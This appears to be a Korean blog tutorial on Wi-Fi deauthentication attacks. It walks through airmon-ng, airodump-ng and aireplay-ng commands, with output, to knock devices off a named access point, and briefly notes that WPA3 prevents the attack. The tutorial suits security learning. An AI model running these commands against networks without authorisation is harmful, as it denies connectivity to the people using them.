Deauthentication(디인증) 이란?
Deauthentication(디인증) 은 디바이스(Station) 과 AP(Access Point 즉 공유기) 사이의 연결을 끊을 때 사용되는 신호입니다.
여기서 디바이스(Station)는 공유기에 연결되어 있는 스마트폰이나 노트북 같은 장치를 뜻합니다.
디인증 신호를 받으면 이 디바이스는 즉시 AP와의 연결이 끊기게 됩니다.
Deauthentication Attack 이란?
위에 디인증 설명을 악용한 사례가 Deauthentication Attack 입니다.
해커는 Deauthentication(디인증) 패킷을 보내 디바이스(Station) 과 AP 의 연결을 강제로 끊어버리게 할수있습니다.
이를 Deauthentication Attack 이라 부릅니다.
Deauthentication Attack 실습
airmon-ng check kill
airmon-ng start wlan0
위 명령어를 사용해 먼저 모니터 모드로 진입을 해줍니다.
모니터 모드에 진입에 성공했다면 공격을 진행할 타겟을 스캔을 해줍니다.
airodump-ng wlan0mon
38:F4:5E:33:15:9B -25 19 0 0 9 130 WPA2 CCMP PSK SK_1598_2.4G
타겟을 선정했다면, aireplay-ng를 사용해 디인증(Deauth) 공격을 진행할 수 있습니다.
원활한 공격을 위해서는 먼저 AP(BSSID) 가 사용 중인 채널과 동일하게 wlan0mon의 채널을 맞춰줘야 합니다.
왜나하면 채널이 같아야만 신호를 제대로 수신할 수 있고, 디인증 패킷도 정상적으로 전송됩니다.
iwconfig wlan0mon channel 9
aireplay-ng -0 0 -a 38:F4:5E:33:15:9B wlan0mon
이제 도스 공격을 진행해 주겠습니다 station 지정은 aireplay-ng 에서 알아서 지정해 주니 따로 명령어에 넣지는 않겠습니다
Sending DeAuth (code 7) to broadcast -- BSSID: [38:F4:5E:33:15:9B]
wireshark
해당 wlan0mon 패킷을 확인하면 deauthentication 패킷이 많이 찍히는걸 보실수 있습니다
또한
해당 와이파이로 연결을 시도해도 연결이 계속 끊어지는걸 보실수 있습니다
해당 공격을 예방하기 위해 WPA3 를 사용한다면 deauth 공격을 예방할수 있습니다
여기까지 봐주셔서 감사합니다